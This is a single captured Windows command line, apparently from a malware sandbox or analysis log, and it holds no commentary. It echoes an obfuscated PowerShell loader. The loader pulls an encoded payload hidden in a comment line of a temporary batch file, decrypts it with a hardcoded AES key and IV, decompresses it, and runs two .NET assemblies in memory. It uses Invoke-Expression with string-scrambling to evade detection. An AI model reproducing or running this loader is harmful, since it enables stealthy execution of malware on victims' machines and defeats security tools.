C:\Windows\system32\cmd.exe /S /D /c" echo function pPrLV($xjezz){ $wMHou=[System.Security.Cryptography.Aes]::Create(); $wMHou.Mode=[System.Security.Cryptography.CipherMode]::CBC; $wMHou.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $wMHou.Key=[System.Convert]::FromBase64String('lO1Vwq/nj9Puc/oGonhZjSQq/nzSWIn0lm/0BxXEcbE='); $wMHou.IV=[System.Convert]::FromBase64String('Z8/xZ+jsEzHKXXOs4H9TJQ=='); $LmFjs=$wMHou.CreateDecryptor(); $ZsDwh=$LmFjs.TransformFinalBlock($xjezz, 0, $xjezz.Length); $LmFjs.Dispose(); $wMHou.Dispose(); $ZsDwh;}function gbxhW($xjezz){ IEX '$Ovdns=New-Object System.IO.M*em*or*yS*tr*ea*m(,$xjezz);'.Replace('*', ''); IEX '$pBnCe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$KPnRz=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Ovdns, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $KPnRz.CopyTo($pBnCe); $KPnRz.Dispose(); $Ovdns.Dispose(); $pBnCe.Dispose(); $pBnCe.ToArray();}function DUZhs($xjezz,$VPKjP){ IEX '$osgqK=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$xjezz);'.Replace('*', ''); IEX '$vIuGg=$osgqK.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$vIuGg.*I*n*v*o*k*e*($null, $VPKjP);'.Replace('*', '');}$IVcAh = 'C:\Users\Admin\AppData\Local\Temp\69e99e962f784f1d4ac17447a74741ff7da3efe70522df9a7bc070b431e4bec0.bat';$host.UI.RawUI.WindowTitle = $IVcAh;$vvRPw=[System.IO.File]::ReadAllText($IVcAh).Split([Environment]::NewLine);foreach ($OSbaK in $vvRPw) { if ($OSbaK.StartsWith(':: ')) { $wgCug=$OSbaK.Substring(3); break; }}$IWIwq=[string[]]$wgCug.Split('\');IEX '$VTaqv=gbxhW (pPrLV ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($IWIwq[0])));'.Replace('*', '');IEX '$ZEjBw=gbxhW (pPrLV ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($IWIwq[1])));'.Replace('*', '');DUZhs $VTaqv $null;DUZhs $ZEjBw (,[string[]] ('')); "